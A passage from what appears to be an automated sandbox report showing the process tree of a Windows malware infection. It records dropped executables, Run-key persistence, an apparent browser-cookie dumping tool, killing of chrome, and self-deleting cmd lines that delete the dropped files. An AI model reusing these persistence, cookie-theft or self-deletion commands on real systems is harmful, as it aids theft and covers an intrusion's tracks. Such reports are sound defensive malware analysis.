                                                                                                                                                                                                                                                          C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                          12⤵
                                                                                                                                                                                                                                                            PID:6824
                                                                                                                                                                                                                                                        • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\JoSetp.exe
                                                                                                                                                                                                                                                          "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\JoSetp.exe"
                                                                                                                                                                                                                                                          11⤵
                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                          PID:6124
                                                                                                                                                                                                                                                          • C:\ProgramData\8520876.exe
                                                                                                                                                                                                                                                            "C:\ProgramData\8520876.exe"
                                                                                                                                                                                                                                                            12⤵
                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                            PID:6224
                                                                                                                                                                                                                                                          • C:\ProgramData\6892652.exe
                                                                                                                                                                                                                                                            "C:\ProgramData\6892652.exe"
                                                                                                                                                                                                                                                            12⤵
                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                            • Adds Run key to start application
                                                                                                                                                                                                                                                            PID:6432
                                                                                                                                                                                                                                                            • C:\ProgramData\Windows Host\Windows Host.exe
                                                                                                                                                                                                                                                              "C:\ProgramData\Windows Host\Windows Host.exe"
                                                                                                                                                                                                                                                              13⤵
                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                              PID:6776
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\JL56KCOEXH\setups.exe
                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\JL56KCOEXH\setups.exe" ll
                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                              PID:1124
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-M7CFB.tmp\setups.tmp
                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-M7CFB.tmp\setups.tmp" /SL5="$301E4,2051888,270336,C:\Users\Admin\AppData\Local\Temp\JL56KCOEXH\setups.exe" ll
                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                • Checks computer location settings
                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                PID:1892
                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full Version.exe
                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full Version.exe"
                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                            • Drops file in Program Files directory
                                                                                                                                                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                            PID:2912
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                                                                                                                              "C:\Windows\System32\WScript.exe" "C:\Program Files\unins0000.vbs"
                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                              PID:2780
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                "C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                PID:2196
                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe
                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"
                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                            • Modifies system certificate store
                                                                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                            PID:816
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                              cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                PID:4772
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                  taskkill /f /im chrome.exe
                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                  PID:4928
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe
                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                              PID:4800
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe" >> NUL
                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                  PID:2704
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                    ping 127.0.0.1
                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                    • Runs ping.exe
                                                                                                                                                                                                                                                    PID:2012
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe
                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"
                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                  PID:1016
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"
                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                    PID:5888
                                                                                                                                                                                                                                                    • C:\ProgramData\3590343.exe
                                                                                                                                                                                                                                                      "C:\ProgramData\3590343.exe"
                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                        PID:6604
                                                                                                                                                                                                                                                      • C:\ProgramData\7572503.exe
                                                                                                                                                                                                                                                        "C:\ProgramData\7572503.exe"
                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                          PID:7356
                                                                                                                                                                                                                                                        • C:\ProgramData\6444768.exe
                                                                                                                                                                                                                                                          "C:\ProgramData\6444768.exe"
                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                            PID:7744
                                                                                                                                                                                                                                                            • C:\ProgramData\6444768.exe
                                                                                                                                                                                                                                                              "{path}"
                                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                                PID:7216
                                                                                                                                                                                                                                                            • C:\ProgramData\647518.exe
                                                                                                                                                                                                                                                              "C:\ProgramData\647518.exe"
                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                PID:7772
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe
                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"
                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                PID:7996
                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                    PID:5180
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                      PID:4020
                                                                                                                                                                                                                                                            • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                              PID:2264
                                                                                                                                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                • Drops file in System32 directory
                                                                                                                                                                                                                                                                • Checks processor information in registry
                                                                                                                                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                PID:3720
                                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                                                                                                                              • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                              PID:4496
                                                                                                                                                                                                                                                            • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                              C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                              • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                              PID:4596
                                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                              PID:5060
                                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                              • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                                                                              PID:4336
                                                                                                                                                                                                                                                            • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                                                              C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                              • Enumerates connected drives
                                                                                                                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                                                                                                                              PID:4796
                                                                                                                                                                                                                                                              • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                C:\Windows\syswow64\MsiExec.exe -Embedding D8AB60B94A29D9CDA9A410EA1107625E C
                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                                PID:5000
                                                                                                                                                                                                                                                              • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                C:\Windows\syswow64\MsiExec.exe -Embedding 7F7AE2A7F60B01EB563D59FD4D7F3E7D
                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                • Blocklisted process makes network request
                                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                                PID:6140
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe
                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"
                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                  PID:6452
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe
                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe" -silent=1 -AF=756 -BF=default -uncf=default
                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                      PID:8056
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" "--anbfs"
                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                          PID:6688
                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Roaming\Weather\Weather.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Weather\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Weather\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Weather\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Weather\User Data" --annotation=plat=Win64 --annotation=prod=Weather --annotation=ver=0.0.2 --initial-client-data=0x1fc,0x200,0x204,0x1d8,0x1bc,0x7ffe22099ec0,0x7ffe22099ed0,0x7ffe22099ee0
                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                              PID:2388
                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Roaming\Weather\Weather.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Weather\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Weather\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Weather --annotation=ver=0.0.2 --initial-client-data=0x158,0x15c,0x160,0x134,0x164,0x7ff68cea4e60,0x7ff68cea4e70,0x7ff68cea4e80
                                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                                  PID:7688
                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1504,4389302478347460992,618714853142548548,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6688_891364501" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1524 /prefetch:2
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                  PID:7796
                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1504,4389302478347460992,618714853142548548,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6688_891364501" --mojo-platform-channel-handle=1848 /prefetch:8
                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                    PID:5512
                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Weather\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1504,4389302478347460992,618714853142548548,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6688_891364501" --nwjs --extension-process --enable-auto-reload --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --mojo-platform-channel-handle=2460 /prefetch:1
                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                      PID:6672
                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1504,4389302478347460992,618714853142548548,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6688_891364501" --mojo-platform-channel-handle=2212 /prefetch:8
                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                        PID:7568
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1504,4389302478347460992,618714853142548548,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6688_891364501" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=1524 /prefetch:2
                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                          PID:7840
                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1504,4389302478347460992,618714853142548548,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6688_891364501" --mojo-platform-channel-handle=1820 /prefetch:8
                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                            PID:5908
                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1504,4389302478347460992,618714853142548548,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6688_891364501" --mojo-platform-channel-handle=3340 /prefetch:8
                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                              PID:6460
                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1504,4389302478347460992,618714853142548548,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6688_891364501" --mojo-platform-channel-handle=2712 /prefetch:8
                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                PID:7212
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EXE9DA4.bat" "
                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                              PID:4252
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                C:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Roaming\Weather\Weather\PREREQ~1"
                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                PID:5064
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                                C:\Windows\System32\timeout.exe 5
                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                PID:5916
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                                C:\Windows\System32\timeout.exe 5
                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                PID:8136
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                C:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Local\Temp\EXE9DA4.bat"
                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                PID:3772
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /S /D /c" del "C:\Users\Admin\AppData\Local\Temp\EXE9DA4.bat" "
                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                  PID:3020
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" cls"
                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                    PID:6512
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EXE9D26.bat" "
                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                    PID:3020
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                      C:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Roaming\Weather\Weather\PREREQ~1\AIPACK~1.EXE"
                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                      • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                      PID:4384
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                                      C:\Windows\System32\timeout.exe 5
                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                      PID:4760
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                      C:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Local\Temp\EXE9D26.bat"
                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                      • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                      PID:816
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" del "C:\Users\Admin\AppData\Local\Temp\EXE9D26.bat" "
                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                        PID:7364
                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /S /D /c" cls"
                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                          PID:5972
                                                                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                    PID:1336
                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                                    C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                    • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                    PID:2160
                                                                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                    PID:5824
                                                                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                                                                                                                    PID:5904
                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Programma configurater\viqconf.exe
                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Programma configurater\viqconf.exe"
                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                                                                                    • Checks processor information in registry
                                                                                                                                                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                    PID:4444
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c taskkill /im viqconf.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Roaming\Programma configurater\viqconf.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                        PID:5972
                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                          taskkill /im viqconf.exe /f
